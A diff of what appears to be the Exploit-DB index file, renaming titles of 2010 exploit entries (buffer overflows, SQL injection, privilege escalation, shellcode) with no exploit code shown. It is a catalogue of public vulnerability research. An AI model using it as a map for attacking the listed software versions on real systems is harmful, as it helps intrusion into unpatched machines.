14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Local Privilege Escalation",2010-07-28,th_decoder,windows,local,0 -14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 +14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post-Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal",2010-07-28,mywisdom,unix,remote,0 @@ -12745,7 +12745,7 @@ id,file,description,date,author,platform,type,port 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - modules.php SQL Injection",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting",2010-08-02,"Juan Manuel Garcia",php,webapps,0 -14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 +14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0 14538,platforms/ios/local/14538.txt,"Apple iOS - pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 @@ -12778,10 +12778,10 @@ id,file,description,date,author,platform,type,port 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0 14580,platforms/windows/remote/14580.html,"Advanced File Vault - (eSellerateControl350.dll) ActiveX Heap Spray (0Day)",2010-08-08,"ThE g0bL!N",windows,remote,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0 -14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service",2010-08-08,"Nishant Das Patnaik",windows,dos,0 +14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec - Denial of Service",2010-08-08,"Nishant Das Patnaik",windows,dos,0 14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service",2010-08-09,"Oh Yaw Theng",windows,dos,0 -14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0 -14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,indoushka,php,webapps,0 +14584,platforms/windows/dos/14584.py,"QQ Computer Manager - TSKsp.sys Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0 +14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0 14598,platforms/php/webapps/14598.txt,"Joomla Component Teams - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0 14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0 @@ -12791,7 +12791,7 @@ id,file,description,date,author,platform,type,port 14594,platforms/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF",2010-08-09,pyw1414,php,webapps,0 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0 -14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0 +14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0Day)",2010-08-10,sud0,windows,remote,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0 @@ -12807,13 +12807,13 @@ id,file,description,date,author,platform,type,port 14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 - Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0 14613,platforms/windows/dos/14613.py,"Windows Live Messenger 14.0.8117 - Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Inclusion",2010-08-11,Offensive,php,webapps,0 -14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure",2010-08-11,Offensive,php,webapps,0 +14615,platforms/php/webapps/14615.txt,"phpMUR - Remote File Disclosure",2010-08-11,Offensive,php,webapps,0 14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion",2010-08-11,LoSt.HaCkEr,php,webapps,0 14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 - webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 -14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS",2010-08-11,fdiskyou,php,webapps,0 -14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21 +14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent XSS",2010-08-11,fdiskyou,php,webapps,0 +14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post-Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 @@ -12823,7 +12823,7 @@ id,file,description,date,author,platform,type,port 14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) Denial of Service",2010-08-13,LiquidWorm,windows,dos,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 -14636,platforms/php/webapps/14636.txt,"Plogger Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps,0 +14636,platforms/php/webapps/14636.txt,"Plogger - Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps,0 14637,platforms/php/webapps/14637.txt,"Get Tube - SQL Injection",2010-08-13,Mr.P3rfekT,php,webapps,0 14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Inclusion",2010-08-13,LoSt.HaCkEr,php,webapps,0 14640,platforms/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,"AmnPardaz ",php,webapps,0 @@ -12888,7 +12888,7 @@ id,file,description,date,author,platform,type,port 14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 14722,platforms/php/webapps/14722.txt,"Joomla 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0 14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - (pptimpconv.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 -14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 pdf Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 +14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - .pdf Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0 14728,platforms/windows/local/14728.c,"Windows Live Email - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Nicolas Krassas",windows,local,0 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - (article.php) SQL Injection",2010-08-28,[]0iZy5,php,webapps,0 @@ -13017,7 +13017,7 @@ id,file,description,date,author,platform,type,port 14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0 14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow Proof of Concept",2010-09-05,0x6264,linux,dos,0 -14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 +14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent XSS",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - SEH Buffer Overflow Crash Proof of Concept",2010-09-05,"Abhishek Lyall",windows,dos,0 @@ -13062,7 +13062,7 @@ id,file,description,date,author,platform,type,port 14971,platforms/windows/dos/14971.py,"Microsoft Office Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules NULL Pointer Dereference DoS",2010-09-11,d0lc3,windows,dos,0 -14976,platforms/linux/remote/14976.txt,"YOPS Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 +14976,platforms/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection and Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0 14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0 @@ -13083,7 +13083,7 @@ id,file,description,date,author,platform,type,port 15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara 3.1 - (Sections Module) Remote Blind SQL Injection",2010-09-14,_mRkZ_,php,webapps,0 -15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",multiple,remote,0 +15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar - Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",multiple,remote,0 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,php,webapps,0 15008,platforms/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 15011,platforms/php/webapps/15011.txt,"php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 @@ -13098,13 +13098,13 @@ id,file,description,date,author,platform,type,port 15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0 15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service",2010-10-03,"xsploited security",windows,dos,0 -15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0 +15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0 15027,platforms/windows/dos/15027.py,"Firefox 3.6.4 - Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 15029,platforms/php/webapps/15029.txt,"phpmyfamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 15032,platforms/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 - (.wav / .mp3) Denial of Service",2010-09-17,modpr0be,windows,dos,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 -15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint bmp Crash Proof Of Concept",2010-09-18,andrew,windows,dos,0 +15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - .bmp Crash Proof Of Concept",2010-09-18,andrew,windows,dos,0 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0 15037,platforms/php/webapps/15037.html,"CMSimple - CSRF",2010-09-18,Abysssec,php,webapps,0 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection 'reviews.php'",2010-09-18,secret,php,webapps,0 @@ -13188,8 +13188,8 @@ id,file,description,date,author,platform,type,port 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0 15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - (id) SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 -15155,platforms/linux/local/15155.c,"XFS Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 -15156,platforms/windows/local/15156.py,"Quick Player 1.3 Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 +15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 +15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0 @@ -13234,7 +13234,7 @@ id,file,description,date,author,platform,type,port 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Remote File Upload",2010-10-07,KnocKout,php,webapps,0 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0 15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection",2010-10-08,ZoRLu,asp,webapps,0 -15220,platforms/php/webapps/15220.txt,"Flex Timesheet Authentication Bypass",2010-10-08,KnocKout,php,webapps,0 +15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0 15222,platforms/php/webapps/15222.txt,"Joomla Community Builder Enhenced (CBE) Component - LFI/RCE",2010-10-09,"Delf Tonder",php,webapps,0 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injection",2010-10-09,KnocKout,php,webapps,0 15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 @@ -13256,7 +13256,7 @@ id,file,description,date,author,platform,type,port 15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload",2010-11-23,trycyber,php,webapps,0 15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0 -15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection",2010-10-10,KnocKout,asp,webapps,0 +15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,asp,webapps,0 15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit",2010-10-11,"xsploited security",windows,remote,0 15232,platforms/php/webapps/15232.txt,"OrangeHRM 2.6.0.1 - Local File Inclusion",2010-10-11,ZonTa,php,webapps,0 15233,platforms/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",php,webapps,0 @@ -13269,9 +13269,9 @@ id,file,description,date,author,platform,type,port 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery",2010-10-12,Yoyahack,php,webapps,0 15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Param Buffer Overflow Exploit",2010-10-13,Skylined,windows,remote,0 -15242,platforms/windows/dos/15242.html,"Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0 +15242,platforms/windows/dos/15242.html,"Firefox 3.5.10 / 3.6.6 - WMP Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0 15243,platforms/windows/dos/15243.html,"Oracle Java APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos,0 -15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 +15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Solaris",2010-10-13,prdelka,solaris,local,0 15247,platforms/php/webapps/15247.txt,"Exponent CMS 0.97 - Multiple Vulnerabilities",2010-10-13,LiquidWorm,php,webapps,0 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0 @@ -13288,7 +13288,7 @@ id,file,description,date,author,platform,type,port 15260,platforms/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",windows,dos,0 15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 -15265,platforms/asp/remote/15265.rb,"ASP.NET Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 +15265,platforms/asp/remote/15265.rb,"ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Windows - NTLM Weak Nonce",2010-10-17,"Hernan Ochoa",windows,remote,0 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local SEH Overwrite",2010-10-17,d0lc3,windows,dos,0 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0 @@ -13309,8 +13309,8 @@ id,file,description,date,author,platform,type,port 15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow",2010-10-21,LiquidWorm,windows,dos,0 15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0 15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection",2010-10-21,"Salvatore Fresta",php,webapps,0 -15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 -15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0 +15292,platforms/windows/remote/15292.rb,"ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 +15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode - Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0 15295,platforms/php/webapps/15295.html,"sNews CMS - Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory corruption (0Day)",2010-10-21,Abysssec,windows,remote,0 15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 / 6.5 - Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 @@ -13382,20 +13382,20 @@ id,file,description,date,author,platform,type,port 15380,platforms/hardware/dos/15380.txt,"Xerox 4595 - Denial of Service",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive - SQL Injection",2010-11-01,"Anatolia Security",php,webapps,0 15382,platforms/asp/webapps/15382.txt,"douran portal 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 -15383,platforms/windows/dos/15383.c,"Rising RSNTGDI.sys Local Denial of Service",2010-11-02,ze0r,windows,dos,0 +15383,platforms/windows/dos/15383.c,"Rising - RSNTGDI.sys Local Denial of Service",2010-11-02,ze0r,windows,dos,0 15384,platforms/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service",2010-11-02,"Nikita Tarakanov",windows,dos,0 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 - Stored Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 - Stored Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 - Stored Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload",2010-11-02,[sh3n],php,webapps,0 15391,platforms/php/webapps/15391.txt,"Azaronline Design - SQL Injection",2010-11-02,XroGuE,php,webapps,0 -15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service",2010-11-02,4n0nym0us,windows,dos,0 +15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 - CSS Denial of Service",2010-11-02,4n0nym0us,windows,dos,0 15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 -15396,platforms/asp/webapps/15396.txt,"Comrie Software Pay Roll Time Sheet & Punch Card Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 +15396,platforms/asp/webapps/15396.txt,"Comrie Software Pay Roll Time Sheet & Punch Card - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15397,platforms/asp/webapps/15397.txt,"Online Work Order System (OWOS) Professional Edition - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15393,platforms/windows/dos/15393.pl,"Quickzip 5.1.8.1 - Denial of Service",2010-11-02,moigai,windows,dos,0 15398,platforms/asp/webapps/15398.txt,"Digger Solutions Newsletter Open Source - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 -15399,platforms/asp/webapps/15399.txt,"Site2Nite Business eListings SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 +15399,platforms/asp/webapps/15399.txt,"Site2Nite Business eListings - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15400,platforms/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps,0 15917,platforms/php/webapps/15917.txt,"Ignition 1.3 - (comment.php) Local File Inclusion",2011-01-06,n0n0x,php,webapps,0 15403,platforms/windows/local/15403.py,"Minishare 1.4.0 < 1.5.5 - Buffer Overflow (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 @@ -13420,7 +13420,7 @@ id,file,description,date,author,platform,type,port 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal (0Day)",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0 -15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of Service",2010-11-05,Sweet,windows,dos,0 +15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) - SQL Injection",2010-11-05,FL0RiX,php,webapps,0 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment NULL Pointer Deference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 15432,platforms/windows/dos/15432.html,"LEADTOOLS 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation DoS",2010-11-05,"Matthew Bergin",windows,dos,0 @@ -13452,8 +13452,8 @@ id,file,description,date,author,platform,type,port 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0 15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0 15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel Exploit (0Day)",2010-11-08,"Nikita Tarakanov",windows,local,0 -15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 -15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 +15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 +15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0 